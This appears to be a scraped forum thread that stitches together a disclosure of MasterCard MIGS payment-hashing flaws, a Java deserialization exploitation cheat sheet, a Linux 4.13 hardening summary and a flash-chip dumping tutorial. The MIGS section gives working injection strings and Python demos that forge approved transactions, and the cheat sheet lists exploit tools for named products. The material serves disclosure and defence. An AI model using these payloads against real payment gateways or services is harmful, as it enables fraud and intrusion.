Name: Joe Amount: 10000 Card: 1234567890123456
vpc_Name=Joe&Vpc_Amount=10000&vpc_Card=1234567890123456
Sort it:
vpc_Amount=10000 vpc_Card=1234567890123456 vpc_Name=Joe
Get the values, and concatenate it:
100001234567890123456Joe
Note that if I change the parameters:
vpc_Name=Joe&Vpc_Amount=1&vpc_Card=1234567890123456&vpc_B=0000
Sort it:
vpc_Amount=1 vpc_B=0000 vpc_Card=1234567890123456 vpc_Name=Joe
Get the values, and concatenate it:
100001234567890123456Joe
The MD5 value is still the same. So basically, when the data is being sent to MIGS, we can just insert an additional parameter after the amount to eat the last digits, or in front of it to eat the first digits. The amount gets slashed, and you can pay for a 2,000 USD MacBook with 2 USD.
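The collision is easy to reproduce in a few lines of Python. This is a sketch of the scheme as described above; the secret is of course made up (the real one is shared between the gateway and MIGS):

```python
import hashlib

SECRET = b"s3cr3t"  # placeholder; the real secret is held by the gateway

def migs_md5_hash(params):
    """Legacy MIGS scheme: MD5(secret + concatenated values of sorted vpc_* fields)."""
    data = "".join(value for key, value in sorted(params.items()))
    return hashlib.md5(SECRET + data.encode()).hexdigest()

original = {"vpc_Amount": "10000", "vpc_Card": "1234567890123456", "vpc_Name": "Joe"}
# vpc_B sorts right after vpc_Amount and "eats" the last digits of the amount
tampered = {"vpc_Amount": "1", "vpc_B": "0000", "vpc_Card": "1234567890123456", "vpc_Name": "Joe"}

print(migs_md5_hash(original) == migs_md5_hash(tampered))  # True: same signature, 1/10000th the price
```

Because the values are concatenated with no delimiter, the hash input cannot tell where one field ends and the next begins.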
Intermediate gateways and merchant can work around this bug by always checking that the amount returned by MIGS is indeed the same as the amount requested.
MasterCard rewarded me with 8500 USD for this bug.
Flaw in the HMAC-SHA256 Hashing
The new HMAC-SHA256 has a flaw that can be exploited if we can inject invalid values into intermediate payment gateways. I have tested that at least one payment gateway (Fusion Payments) has this bug. I was rewarded 500 USD by Fusion Payments. It may affect other payment gateways that connect to MIGS.
In the new version, they have added delimiters (&) between fields, added field names and not just values, and used HMAC-SHA256. For the same data above, the hashed data is:
Vpc_Amount=10000&vpc_Card=1234567890123456&vpc_Name=Joe
We can’t shift anything, everything should be fine. But what happens if a value contains & or = or other special characters?
Reading this documentation, it says that:
Note: The values in all name value pairs should NOT be URL encoded for the purpose of hashing.
The “NOT” is my emphasis. It means that if we have these fields:
Amount=100 Card=1234 CVV=555
It will be hashed as: HMAC(Amount=100&Card=1234&CVV=555)
And if we have this (amount contains the & and =)
Amount=100&Card=1234 CVV=555
It will be hashed as: HMAC(Amount=100&Card=1234&CVV=555)
The same as before. Still not really a problem at this point.
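The ambiguity can be demonstrated offline: since values are not URL-encoded before hashing, a value containing & and = produces exactly the same hash input as the honest field list. A sketch with a made-up key:

```python
import hashlib
import hmac

SECRET = b"s3cr3t"  # placeholder key

def migs_hmac(pairs):
    """New MIGS scheme: HMAC-SHA256 over name=value pairs joined with '&', values NOT URL-encoded."""
    data = "&".join(f"{name}={value}" for name, value in pairs)
    return hmac.new(SECRET, data.encode(), hashlib.sha256).hexdigest()

honest = [("Amount", "100"), ("Card", "1234"), ("CVV", "555")]
# the Amount value smuggles in a whole extra field, yet hashes identically
sneaky = [("Amount", "100&Card=1234"), ("CVV", "555")]

print(migs_hmac(honest) == migs_hmac(sneaky))  # True
```

Had the values been URL-encoded before hashing, the two inputs would differ and the signatures would no longer collide.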
Of course, I thought that maybe the documentation is wrong, maybe the values should be encoded. But I have checked the behavior of the MIGS server, and the behavior is as documented. Maybe they don’t want to deal with different encodings (such as + instead of %20).
There doesn’t seem to be any problem with that, any invalid values will be checked by MIGS and will cause an error (for example invalid amount above will be rejected).
But I noticed that several payment gateways, instead of validating inputs on their server side, just sign everything and give it to MIGS. It’s much easier to do just JavaScript checking on the client side, sign the data on the server side, and let MIGS decide whether the card number is correct or not, whether the CVV should be 3 or 4 digits, whether the expiration date is correct, etc. The logic is: MIGS will recheck the inputs, and will do it better.
On Fusion Payments, I found out that this is exactly what happened: they allow characters of any kind and length to be sent for the CVV (it is only checked in JavaScript); they will sign the request and send it to MIGS.
Exploit
To exploit this we need to construct a string which is both a valid request and a valid MIGS server response. We don’t need to contact the MIGS server at all; we are forcing the client to sign valid data for itself.
A basic request looks like this:
vpc_AccessCode=9E33F6D7&vpc_Amount=25&vpc_Card=Visa&vpc_CardExp=1717&vpc_CardNum=4599777788889999&vpc_CardSecurityCode=999&vpc_OrderInfo=ORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256
and a basic response from the server will look like this:
vpc_Message=Approved&vpc_OrderInfo=ORDERINFO&vpc_ReceiptNo=722819658213&vpc_TransactionNo=2000834062&vpc_TxnResponseCode=0&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256
In Fusion Payments’ case, the exploit is done by injecting into vpc_CardSecurityCode (CVV):
vpc_AccessCode=9E33F6D7&vpc_Amount=25&vpc_Card=Visa&vpc_CardExp=1717&vpc_CardNum=4599777788889999&vpc_CardSecurityCode=999%26vpc_Message%3DApproved%26vpc_OrderInfo%3DORDERINFO%26vpc_ReceiptNo%3D722819658213%26vpc_TransactionNo%3D2000834062%26vpc_TxnResponseCode%3D0%26vpc_Z%3Da&vpc_OrderInfo=ORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256
The client/payment gateway will generate the correct hash for this string.
Now we can post this data back to the client itself (without ever going to the MIGS server), but we change it slightly so that the client will read the correct variables (most clients will only check for vpc_TxnResponseCode and vpc_TransactionNo):
vpc_AccessCode=9E33F6D7%26vpc_Amount%3D25%26vpc_Card%3DVisa%26vpc_CardExp%3D1717%26vpc_CardNum%3D4599777788889999%26vpc_CardSecurityCode%3D999&vpc_Message=Approved&vpc_OrderInfo=ORDERINFO&vpc_ReceiptNo=722819658213&vpc_TransactionNo=2000834062&vpc_TxnResponseCode=0&vpc_Z=a%26vpc_OrderInfo%3DORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256
Note that:
- This will be hashed the same as the previous data
- The client will ignore vpc_AccessCode and the value inside it
- The client will process the vpc_TxnResponseCode, etc and assume the transaction is valid
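The trick in the two payloads above can be checked offline: after URL-decoding, both strings produce the identical hash input, while a naive query-string parser extracts completely different fields from each. A sketch, with a made-up key and shortened field lists:

```python
import hashlib
import hmac
from urllib.parse import parse_qsl

SECRET = b"s3cr3t"  # placeholder; in reality only the gateway knows it

def migs_hmac(query_string):
    """Hash input: URL-decoded name=value pairs joined with '&' (values not re-encoded)."""
    data = "&".join(f"{k}={v}" for k, v in parse_qsl(query_string))
    return hmac.new(SECRET, data.encode(), hashlib.sha256).hexdigest()

# request signed by the gateway: the "CVV" smuggles a fake MIGS response
request = ("vpc_Amount=25&vpc_CardNum=4599777788889999"
           "&vpc_CardSecurityCode=999%26vpc_TxnResponseCode%3D0%26vpc_Z%3Da"
           "&vpc_OrderInfo=ORDERINFO")
# the same characters re-escaped: now vpc_TxnResponseCode=0 is a top-level field
response = ("vpc_Amount=25%26vpc_CardNum%3D4599777788889999"
            "%26vpc_CardSecurityCode%3D999&vpc_TxnResponseCode=0"
            "&vpc_Z=a%26vpc_OrderInfo%3DORDERINFO")

print(migs_hmac(request) == migs_hmac(response))         # True: same signature
print(dict(parse_qsl(response))["vpc_TxnResponseCode"])  # 0, i.e. "approved"
```

The signature never changes; only the position of the escaped & and = characters decides which fields a parser sees.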
It can be said that this is a MIGS client bug, but the hashing method chosen by MasterCard allows this to happen; had the values been encoded, this bug would not have been possible.
Response from MIGS
MasterCard did not respond to this bug in the HMAC-SHA256. When reporting it, I CC-ed several people who handled the previous bug. None of the emails bounced. Not even a “we are checking this” email from them. They also have my Facebook in case they need to contact me (this is from the interaction about the MD5 bug).
Some people are sneaky and will try to deny that they have received a bug report, so now when reporting a bug, I put it in a password-protected post (that is why you can see several password-protected posts in this blog). So far there have been at least 3 views from MasterCard IP addresses (3 views that entered the password). They have to type in a password to read the report, so it is impossible for them to accidentally click it without reading it. I have nagged them every week for a reply.
My expectation was that they would try to warn everyone connecting to their system to check and filter for injections.
Flaws In Payment Gateways
As an extra note: even though payment gateways handle money, they are not as secure as people think. During my pentests I found several flaws in the design of the payment protocol on several intermediate gateways. Unfortunately, I can’t go into detail on this one (when I say “pentests”, it means something under NDA).
I also found flaws in the implementation. For example Hash Length Extension Attack, XML signature verification error, etc. One of the simplest bugs that I found is in Fusion Payments. The first bug that I found was: they didn’t even check the signature from MIGS. That means we can just alter the data returned by MIGS and mark the transaction as successful. This just means changing a single character from F (false) to 0 (success).
So basically we can just enter any credit card number, get a failed response from MIGS, change it, and suddenly the payment is successful. This is a 20 million USD company, and I got 400 USD for this bug. This is not the first payment gateway that had this flaw; during my pentests I found this exact bug in another payment gateway. Despite the relatively low bounty, Fusion Payments is currently the only payment gateway I contacted that is very clear about their bug bounty program, and is very quick in responding to my emails and fixing their bugs.
Conclusion
Payment gateways are not as secure as you think. With the relatively low bounties (and in several cases that I have reported: 0 USD), I wonder how many people have already exploited bugs in payment gateways.
Sursa: http://tinyhack.com/2017/09/05/mastercard-internet-gateway-service-hashing-design-flaw/
-
Great, only two months and change have passed since the last post.
-
Java-Deserialization-Cheat-Sheet
A cheat sheet for pentesters and researchers about deserialization vulnerabilities in various Java (JVM) serialization libraries.
Please use the #javadeser hashtag for tweets.
Table of contents
- Java Native Serialization (binary)
- XMLEncoder (XML)
- XStream (XML/JSON/various)
- Kryo (binary)
- Hessian/Burlap (binary/XML)
- Castor (XML)
- json-io (JSON)
- Jackson (JSON)
- Red5 IO AMF (AMF)
- Apache Flex BlazeDS (AMF)
- Flamingo AMF (AMF)
- GraniteDS (AMF)
- WebORB for Java (AMF)
- SnakeYAML (YAML)
- jYAML (YAML)
- YamlBeans (YAML)
- "Safe" deserialization
Java Native Serialization (binary)
Overview
Main talks & presentations & docs
Marshalling Pickles
Exploiting Deserialization Vulnerabilities in Java
Serial Killer: Silently Pwning Your Java Endpoints
by @pwntester & @cschneider4711
Deserialize My Shorts: Or How I Learned To Start Worrying and Hate Java Object Deserialization
Surviving the Java serialization apocalypse
by @cschneider4711 & @pwntester
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Pwning Your Java Messaging With Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities
A Journey From JNDI/LDAP Manipulation To Remote Code Execution Dream Land
by @pwntester and O. Mirosh
Fixing the Java Serialization mess
by @e_rnst
Blind Java Deserialization
by deadcode.me
Payload generators
ysoserial
https://github.com/frohoff/ysoserial
RCE (or smth else) via:
- Apache Commons Collections <= 3.1
- Apache Commons Collections <= 4.0
- Groovy <= 2.3.9
- Spring Core <= 4.1.4 (?)
- JDK <=7u21
- Apache Commons BeanUtils 1.9.2 + Commons Collections <=3.1 + Commons Logging 1.2 (?)
- BeanShell 2.0
- Groovy 2.3.9
- Jython 2.5.2
- C3P0 0.9.5.2
- Apache Commons Fileupload <= 1.3.1 (File uploading, DoS)
- ROME 1.0
- MyFaces
- JRMPClient/JRMPListener
- JSON
- Hibernate
Additional tools (integration ysoserial with Burp Suite):
Full shell (pipes, redirects and other stuff):
- $@|sh – Or: Getting a shell environment from Runtime.exec
- Set String[] for Runtime.exec (patch ysoserial's payloads)
- Shell Commands Converter
How it works:
- https://blog.srcclr.com/commons-collections-deserialization-vulnerability-research-findings/
- http://gursevkalra.blogspot.ro/2016/01/ysoserial-commonscollections1-exploit.html
JRE8u20_RCE_Gadget
https://github.com/pwntester/JRE8u20_RCE_Gadget
Pure JRE 8 RCE Deserialization gadget
ACEDcup
https://github.com/GrrrDog/ACEDcup
File uploading via:
- Apache Commons FileUpload <= 1.3 (CVE-2013-2186) and Oracle JDK < 7u40
Universal billion-laughs DoS
https://gist.github.com/coekie/a27cc406fc9f3dc7a70d
Won't fix DoS via default Java classes (JRE)
Universal Heap overflows DoS using Arrays and HashMaps
https://github.com/topolik/ois-dos/
How it works:
Won't fix DoS using default Java classes (JRE)
Exploits
no spec tool - You don't need a special tool (just Burp/ZAP + payload)
RMI
- Protocol
- Default - 1099/tcp for rmiregistry
ysoserial (works only against a RMI registry service)
JMX
- Protocol based on RMI
- partially patched in JRE
JNDI/LDAP
- When we control an address used for a JNDI lookup (context.lookup(address)) and can get a backconnect from the server
- Full info
- JNDI remote code injection
https://github.com/zerothoughts/jndipoc
JMS
JSF ViewState
- if no encryption or good mac
no spec tool
T3 of Oracle Weblogic
- Protocol
- Default - 7001/tcp on localhost interface
- CVE-2015-4852
loubia (tested on 11g and 12c, supports t3s)
JavaUnserializeExploits (doesn't work for all Weblogic versions)
IBM Websphere 1
- wsadmin
- Default port - 8880/tcp
- CVE-2015-7450
IBM Websphere 2
- When using custom form authentication
- WASPostParam cookie
- Full info
no spec tool
Red Hat JBoss
- http://jboss_server/invoker/JMXInvokerServlet
- Default port - 8080/tcp
- CVE-2015-7501
https://github.com/njfox/Java-Deserialization-Exploit
Jenkins
- Jenkins CLI
- Default port - High number/tcp
- CVE-2015-8103
- CVE-2015-3253
Jenkins 2
- patch "bypass" for Jenkins
- CVE-2016-0788
- Details of exploit
Jenkins 3
- Jenkins CLI LDAP
- Default port - High number/tcp
- <= 2.32
- <= 2.19.3 (LTS)
- CVE-2016-9299
Metasploit Module for CVE-2016-9299
Restlet
- <= 2.1.2
- When Rest API accepts serialized objects (uses ObjectRepresentation)
no spec tool
RESTEasy
- When the REST API accepts serialized objects (uses @Consumes({"*/*"}) or "application/*")
- Details and examples
no spec tool
OpenNMS
- RMI
Progress OpenEdge RDBMS
- all versions
- RMI
Commvault Edge Server
- CVE-2015-7253
- Serialized object in cookie
no spec tool
Symantec Endpoint Protection Manager
- /servlet/ConsoleServlet?ActionType=SendStatPing
- CVE-2015-6555
Oracle MySQL Enterprise Monitor
- https://[target]:18443/v3/dataflow/0/0
- CVE-2016-3461
no spec tool
PowerFolder Business Enterprise Suite
- custom(?) protocol (1337/tcp)
- MSA-2016-01
Solarwinds Virtualization Manager
- <= 6.3.1
- RMI
- CVE-2016-3642
Cisco Prime Infrastructure
- https://[target]/xmp_data_handler_service/xmpDataOperationRequestServlet
- <= 2.2.3 Update 4
- <= 3.0.2
- CVE-2016-1291
CoalfireLabs/java_deserialization_exploits
Cisco ACS
- <= 5.8.0.32.2
- RMI (2020 tcp)
- CSCux34781
Apache XML-RPC
- all version, no fix (the project is not supported)
- POST XML request with ex:serializable element
- Details and examples
no spec tool
Apache Archiva
- because it uses Apache XML-RPC
- CVE-2016-5004
- Details and examples
no spec tool
SAP NetWeaver
- https://[target]/developmentserver/metadatauploader
- CVE-2017-9844
Sun Java Web Console
- admin panel for Solaris
- < v3.1.
- old DoS sploit
no spec tool
Apache MyFaces Trinidad
- 1.0.0 <= version < 1.0.13
- 1.2.1 <= version < 1.2.14
- 2.0.0 <= version < 2.0.1
- 2.1.0 <= version < 2.1.1
- it does not check MAC
- CVE-2016-5004
no spec tool
Apache Tomcat JMX
OpenText Documentum D2
- version 4.x
- CVE-2017-5586
Apache ActiveMQ - Client lib
Redhat/Apache HornetQ - Client lib
Oracle OpenMQ - Client lib
IBM WebSphereMQ - Client lib
Oracle Weblogic - Client lib
Pivotal RabbitMQ - Client lib
IBM MessageSight - Client lib
IIT Software SwiftMQ - Client lib
Apache ActiveMQ Artemis - Client lib
Apache QPID JMS - Client lib
Apache QPID - Client lib
Amazon SQS Java Messaging - Client lib
Detect
Code review
- ObjectInputStream.readObject
- ObjectInputStream.readUnshared
- Tool: Find Security Bugs
- Tool: Serianalyzer
Traffic
- Magic bytes 'ac ed 00 05'
- 'rO0' for Base64
- 'application/x-java-serialized-object' for Content-Type header
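These signatures are trivial to triage for in captured traffic. A quick Python sketch (the sample blobs are made up):

```python
import base64

JAVA_MAGIC = bytes.fromhex("aced0005")  # ObjectOutputStream magic + stream version

def looks_like_java_serialized(blob):
    """Flag raw or Base64-encoded Java native serialization streams."""
    if blob.startswith(JAVA_MAGIC):
        return True
    # Base64 of a stream starting with 0xac 0xed 0x00 always begins with 'rO0'
    return blob.startswith(b"rO0")

raw = bytes.fromhex("aced00057372")  # start of a serialized object ('sr' tag)
print(looks_like_java_serialized(raw))                    # True
print(looks_like_java_serialized(base64.b64encode(raw)))  # True
print(looks_like_java_serialized(b"GET / HTTP/1.1"))      # False
```

Checking the Content-Type header for 'application/x-java-serialized-object' catches the remaining cases where the body is chunked or compressed.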
Network
- Nmap >=7.10 has more java-related probes
- use nmap --version-all to find JMX/RMI on non-standard ports
Burp plugins
Vulnerable apps (without public sploits/need more info)
Spring Service Invokers (HTTP, JMS, RMI...)
SAP P4
Apache SOLR
- SOLR-8262
- 5.1 <= version <=5.4
- /stream handler uses Java serialization for RPC
Apache Shiro
- SHIRO-550
- encrypted cookie (with the hardcoded key)
Apache ActiveMQ (2)
Atlassian Bamboo (1)
- CVE-2015-6576
- 2.2 <= version < 5.8.5
- 5.9.0 <= version < 5.9.7
Atlassian Bamboo (2)
- CVE-2015-8360
- 2.3.1 <= version < 5.9.9
- Bamboo JMS port (port 54663 by default)
Atlassian Jira
- only Jira with a Data Center license
- RMI (port 40001 by default)
- JRA-46203
Akka
- version < 2.4.17
- "an ActorSystem exposed via Akka Remote over TCP"
- Official description
Spring AMPQ
- CVE-2016-2173
- 1.0.0 <= version < 1.5.5
Apache Tika
- CVE-2016-6809
- 1.6 <= version < 1.14
- Apache Tika’s MATLAB Parser
Apache HBase
Apache Camel
Gradle (gui)
- custom(?) protocol(60024/tcp)
- article
Oracle Hyperion
Oracle Application Testing Suite
Red Hat JBoss BPM Suite
VMWare vRealize Operations
- 6.0 <= version < 6.4.0
- REST API
- VMSA-2016-0020
- CVE-2016-7462
VMWare vCenter/vRealize (various)
Cisco (various)
Lexmark Markvision Enterprise
McAfee ePolicy Orchestrator
HP iMC
HP Operations Orchestration
HP Asset Manager
HP Service Manager
HP Operations Manager
HP Release Control
HP Continuous Delivery Automation
HP P9000, XP7 Command View Advanced Edition (CVAE) Suite
HP Network Automation
Adobe Experience Manager
Unify OpenScape (various)
- CVE-2015-8237
- RMI (30xx/tcp)
- CVE-2015-8238
- js-soc protocol (4711/tcp)
Apache TomEE
IBM Congnos BI
Novell NetIQ Sentinel
ForgeRock OpenAM
- 9-9.5.5, 10.0.0-10.0.2, 10.1.0-Xpress, 11.0.0-11.0.3 and 12.0.0
- 201505-01
F5 (various)
Hitachi (various)
Apache OFBiz
NetApp (various)
Apache Tomcat
- requires local access
- CVE-2016-0714
- Article
Zimbra Collaboration
- version < 8.7.0
- CVE-2016-3415
Apache Batchee
Apache JCS
Apache OpenJPA
Apache OpenWebBeans
Protection
- Look-ahead Java deserialization
- NotSoSerial
- SerialKiller
- ValidatingObjectInputStream
- Name Space Layout Randomization
- Some protection bypasses
- Tool: Serial Whitelist Application Trainer
- JEP 290: Filter Incoming Serialization Data in JDK 6u141, 7u131, 8u121
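As an aside, the look-ahead idea carries over directly to Python's pickle (the subject of this thread's intro): overriding Unpickler.find_class lets you whitelist classes before they are instantiated, just as look-ahead Java deserialization inspects class names before resolving them. A minimal sketch:

```python
import io
import pickle

class LookAheadUnpickler(pickle.Unpickler):
    """Whitelist classes before instantiation, analogous to look-ahead Java deserialization."""
    ALLOWED = {("builtins", "range")}  # example whitelist; extend as needed

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"blocked: {module}.{name}")
        return super().find_class(module, name)

# plain containers never hit find_class, so they load fine
print(LookAheadUnpickler(io.BytesIO(pickle.dumps([1, 2, 3]))).load())  # [1, 2, 3]

# the classic os.system gadget is rejected before any code runs
evil = b"cos\nsystem\n(S'id'\ntR."
try:
    LookAheadUnpickler(io.BytesIO(evil)).load()
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```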
For Android
- One Class to Rule Them All: 0-Day Deserialization Vulnerabilities in Android
- Android Serialization Vulnerabilities Revisited
XMLEncoder (XML)
How it works:
- http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
- Java Unmarshaller Security
Payload generators:
XStream (XML/JSON/various)
How it works:
- http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/
- http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
- https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream
- Java Unmarshaller Security
Payload generators:
Vulnerable apps (without public sploits/need more info):
Atlassian Bamboo
Jenkins
Kryo (binary)
How it works:
- https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-1-kryo
- Java Unmarshaller Security
Payload generators:
Hessian/Burlap (binary/XML)
How it works:
Payload generators:
Castor (XML)
How it works:
Payload generators:
Vulnerable apps (without public sploits/need more info):
OpenNMS
json-io (JSON)
How it works:
Payload generators:
Jackson (JSON)
vulnerable in some configuration
How it works:
Payload generators:
Vulnerable apps (without public sploits/need more info):
Apache Camel
Red5 IO AMF (AMF)
How it works:
Payload generators:
Vulnerable apps (without public sploits/need more info):
Apache OpenMeetings
Apache Flex BlazeDS (AMF)
How it works:
Payload generators:
Vulnerable apps (without public sploits/need more info):
Adobe ColdFusion
- CVE-2017-3066
- <= 2016 Update 3
- <= 11 update 11
- <= 10 Update 22
Apache BlazeDS
VMWare VCenter
Flamingo AMF (AMF)
How it works:
GraniteDS (AMF)
How it works:
WebORB for Java (AMF)
How it works:
SnakeYAML (YAML)
How it works:
Payload generators:
Vulnerable apps (without public sploits/need more info):
Resteasy
Apache Camel
Apache Brooklyn
jYAML (YAML)
How it works:
Payload generators:
YamlBeans (YAML)
How it works:
Payload generators:
"Safe" deserialization
Some serialization libs are safe (or almost safe): https://github.com/mbechler/marshalsec
However, it's not a recommendation, just a list of other libs that have been researched by someone:
- JAXB
- XmlBeans
- Jibx
- Protobuf
- GSON
- GWT-RPC
Sursa: https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
-
9/5/2017
security things in Linux v4.13
Previously: v4.12.
Here’s a short summary of some of the interesting security things in Sunday’s v4.13 release of the Linux kernel:
security documentation ReSTification
The kernel has been switching to formatting documentation with ReST, and I noticed that none of the Documentation/security/ tree had been converted yet. I took the opportunity to take a few passes at formatting the existing documentation and, at Jon Corbet’s recommendation, split it up between end-user documentation (which is mainly how to use LSMs) and developer documentation (which is mainly how to use various internal APIs). A bunch of these docs need some updating, so maybe with the improved visibility, they’ll get some extra attention.
CONFIG_REFCOUNT_FULL
Since Peter Zijlstra implemented the refcount_t API in v4.11, Elena Reshetova (with Hans Liljestrand and David Windsor) has been systematically replacing atomic_t reference counters with refcount_t. As of v4.13, there are now close to 125 conversions with many more to come. However, there were concerns over the performance characteristics of the refcount_t implementation from the maintainers of the net, mm, and block subsystems. In order to assuage these concerns and help the conversion progress continue, I added an “unchecked” refcount_t implementation (identical to the earlier atomic_t implementation) as the default, with the fully checked implementation now available under CONFIG_REFCOUNT_FULL. The plan is that for v4.14 and beyond, the kernel can grow per-architecture implementations of refcount_t that have performance characteristics on par with atomic_t (as done in grsecurity’s PAX_REFCOUNT).
CONFIG_FORTIFY_SOURCE
Daniel Micay created a version of glibc’s FORTIFY_SOURCE compile-time and run-time protection for finding overflows in the common string (e.g. strcpy, strcmp) and memory (e.g. memcpy, memcmp) functions. The idea is that since the compiler already knows the size of many of the buffer arguments used by these functions, it can already build in checks for buffer overflows. When all the sizes are known at compile time, this can actually allow the compiler to fail the build instead of continuing with a proven overflow. When only some of the sizes are known (e.g. destination size is known at compile-time, but source size is only known at run-time) run-time checks are added to catch any cases where an overflow might happen. Adding this found several places where minor leaks were happening, and Daniel and I chased down fixes for them.
One interesting note about this protection is that it only examines the size of the whole object (via __builtin_object_size(..., 0)). If you have a string within a structure, CONFIG_FORTIFY_SOURCE as currently implemented will make sure only that you can’t copy beyond the structure (but therefore, you can still overflow the string within the structure). The next step in enhancing this protection is to switch from 0 (above) to 1, which will use the closest surrounding subobject (e.g. the string). However, there are a lot of cases where the kernel intentionally copies across multiple structure fields, which means more fixes before this higher level can be enabled.
NULL-prefixed stack canary
Rik van Riel and Daniel Micay changed how the stack canary is defined on 64-bit systems to always make sure that the leading byte is zero. This provides a deterministic defense against overflowing string functions (e.g. strcpy), since they will either stop an overflowing read at the NULL byte, or be unable to write a NULL byte, thereby always triggering the canary check. This does reduce the entropy from 64 bits to 56 bits for overflow cases where NULL bytes can be written (e.g. memcpy), but the trade-off is worth it. (Besides, x86_64’s canary was 32 bits until recently.)
IPC refactoring
Partially in support of allowing IPC structure layouts to be randomized by the randstruct plugin, Manfred Spraul and I reorganized the internal layout of how IPC is tracked in the kernel. The resulting allocations are smaller and much easier to deal with, even if I initially missed a few needed container_of() uses.
randstruct gcc plugin
I ported grsecurity’s clever randstruct gcc plugin to upstream. This plugin allows structure layouts to be randomized on a per-build basis, providing a probabilistic defense against attacks that need to know the location of sensitive structure fields in kernel memory (which is most attacks). By moving things around in this fashion, attackers need to perform much more work to determine the resulting layout before they can mount a reliable attack.
Unfortunately, due to the timing of the development cycle, only the “manual” mode of randstruct landed in upstream (i.e. marking structures with __randomize_layout). v4.14 will also have the automatic mode enabled, which randomizes all structures that contain only function pointers.
A large number of fixes to support randstruct have been landing from v4.10 through v4.13, most of which were already identified and fixed by grsecurity, but many were novel, either in newly added drivers, as whitelisted cross-structure casts, refactorings (like IPC noted above), or in a corner case on ARM found during upstream testing.
lower ELF_ET_DYN_BASE
One of the issues identified from the Stack Clash set of vulnerabilities was that it was possible to collide stack memory with the highest portion of a PIE program’s text memory since the default ELF_ET_DYN_BASE (the lowest possible random position of a PIE executable in memory) was already so high in the memory layout (specifically, 2/3rds of the way through the address space). Fixing this required teaching the ELF loader how to load interpreters as shared objects in the mmap region instead of as a PIE executable (to avoid potentially colliding with the binary it was loading). As a result, the PIE default could be moved down to ET_EXEC (0x400000) on 32-bit, entirely avoiding the subset of Stack Clash attacks. 64-bit could be moved to just above the 32-bit address space (0x100000000), leaving the entire 32-bit region open for VMs to do 32-bit addressing, but late in the cycle it was discovered that Address Sanitizer couldn’t handle it moving. With most of the Stack Clash risk only applicable to 32-bit, fixing 64-bit has been deferred until there is a way to teach Address Sanitizer how to load itself as a shared object instead of as a PIE binary.
early device randomness
I noticed that early device randomness wasn’t actually getting added to the kernel entropy pools, so I fixed that to improve the effectiveness of the latent_entropy gcc plugin.
That’s it for now; please let me know if I missed anything. As a side note, I was rather alarmed to discover that due to all my trivial ReSTification formatting, and tiny FORTIFY_SOURCE and randstruct fixes, I made it into the most active 4.13 developers list (by patch count) at LWN with 76 patches: a whopping 0.6% of the cycle’s patches.
Anyway, the v4.14 merge window is open!
© 2017, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Sursa: https://outflux.net/blog/archives/2017/09/05/security-things-in-linux-v4-13/
-
Flash Dumping - Part I
Date: Tue 05 September 2017. By: Emma Benoit, Guillaume Heilles, Philippe Teuwen. Category: Hardware. Tags: PCB, flash, KiCAD.
First part of a blog post series about our approach to dump a flash chip. In this article we describe how to desolder the flash, then design and build the corresponding breakout board.
This blog post series will detail simple yet effective attacks against embedded devices non-volatile memories. This type of attack enables you to do the following:
- read the content of a memory chip;
- modify the content of a memory chip;
- monitor the accesses from/to a memory chip and modify them on the fly (Man-In-The-Middle attack).
In particular, the following topics will be discussed:
- Desoldering of a flash chip;
- Conception of a breakout board with KiCAD;
- PCB fabrication and microsoldering;
- Addition of a breakout board on an IoT device;
- Dump of a SPI flash;
- Dump of a parallel flash;
- Man-in-the-Middle attacks.
Let's say you opened up yet-another-IoT-device and stumbled on a flash chip inside. Curious as you are, you obviously want to know what's going on inside.
Desoldering the flash chip
To read the content of the flash chip, there are basically two options :
- connecting wires directly on the pins of the chip;
- desoldering the flash and plug it on another board.
One of the things to consider when choosing a method to read the chip is the packaging of the integrated circuit (IC). For example, connecting wires directly on the pins of the chip works well with chips using a quad flat pack (QFP) packaging, but it's less suitable if there are no visible pins. In the following case, the flash chip uses a ball grid array (BGA) packaging, which means no visible pins to fiddle with, so we chose to desolder the IC.
Picture of our target chip:
On the bright side:
- Since we're extracting the flash, all possible interferences with the onboard microcontroller are avoided.
- The chip is removed completely from the board, which gives us the ability to study the PCB underneath and find out the routing to the flash chip.
- The original chip can be replaced with something else (another chip, a microcontroller, ...).
On the less bright side:
- The board cannot run without all of its components, you'll have to solder it back if you want to use it in the future.
- Some nearby components could be damaged during the extraction.
- The flash chip itself could be damaged if it's done improperly.
So... desoldering flash, right? If you never tried desoldering electronic components before, the tricky part is to melt the solder on all pins at the same time. There are several techniques to do that. We choose to go with the heat gun. The goal is to heat the area where the chip is, wait for the solder to melt and remove the chip.
This technique is simple and rapid but it tends to desolder adjacent components, so be careful not to move them (i.e. this is exactly the worst moment to sneeze).
The picture below shows our chip removed from its footprint, and we can now have a look at the PCB routing. We can already make some hypotheses, like the two bottom rows, which are likely unused since they are not routed.
Conception of a breakout board with KiCAD
What do we do now with that chip? BGA layouts are a mess: you can have a 5x5 grid or a 4x6 grid for the exact same chip. Pinouts are equally fun, and usually specific to the chip. Another thing you might be wondering is how to access a particular pin when they are all packed together in a grid like that?
One solution is to make a breakout board! Basically, a breakout board mirrors all the pins of the chip but with more space between them, so you can access them easily.
To realize this, we first need to gather some information about the chip itself. Most of the time, the brand and/or model are written on the chip and help identify it. With this information, one can look for the corresponding datasheets. If you can't identify the chip or if you can't find the datasheet, you will have to do some reverse engineering on the PCB to identify each signal.
The brand is indicated on the first line of our chip: MXIC stands for Macronix International. The second line is the model of the chip, which leads us to the MX25L3255EXCI datasheet.
The section that is of interest to us is the pin layout, page 7 of the datasheet. Both BGA configurations (4x6 and 5x5) are described as well as a SOP8 package. We can see that only eight pins are useful, other pins are tagged "NC" which means "no connection".
To communicate with the flash chip, we need a PCB exporting all the required pins to some easy-to-access header.
